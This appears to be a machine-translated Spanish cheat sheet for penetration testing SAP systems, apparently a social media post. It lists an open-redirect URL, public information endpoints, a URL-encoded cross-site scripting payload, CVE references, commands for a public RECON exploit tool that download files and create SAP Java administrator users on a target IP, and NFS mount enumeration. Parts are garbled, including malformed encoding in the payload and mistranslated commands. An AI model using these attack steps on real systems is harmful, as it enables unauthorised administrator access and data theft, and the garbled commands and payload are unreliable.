Bismilla
Para realizar el Pentest, debe implementar el sistema SAP en su red
https: // host/sap/public/bc/icf/logoff? redirecturl = malicioso
http: // host: puerto/startpage
http: // host: puerto/sap/public/info
http: // host: puerto/sap/public/info
Buscar/sapirexthelp https: // localhost/sapirexthelp
https: // host/sapirexthelp/aleator/%22%3e%3C%53%56%47%20%4F%4E%4C%4F%41%44%3D%26%23%39%37%26%23%31 %30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%26%26%23%78%36%34%26%23%36%66%26%78%36%36 %33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%78%365%65%26%78%37%34%26%23%78%32%65%26%26% %23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%26%23%78%36%26%23%78%36%65%29%3E.
SAP Information System 1.0 SHELL SUPTOW
CVE-2022-22536 (ICMAD SAP)
SAP Recon Vulnerabilidad (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/sap_recon
Descargar el archivo zip
Python Recon.py -h 172.16.30.8 -f /1111.zip
Crear usuario de SAP Java
Python Recon.py -h 172.16.30.8 -u
Crear usuario de administrador de SAP Java
Python Recon.py -h 172.16.30.8 -A
sslscan
NFS-LS NFS: // Host/Mount
mkdir mnt && monte -t nfs host:/Mount ./mnt
Buena suerte buscando información confidencial
Estoy buscando una máquina o contenedor virtual de SAP para hacer una simulación Pentest, si tiene información, por favor, amablemente me dm @linkedin)
Compartir es cariñoso
كماقال صلى الله عليه وسلم: "خير الناس أنفعهم للناس"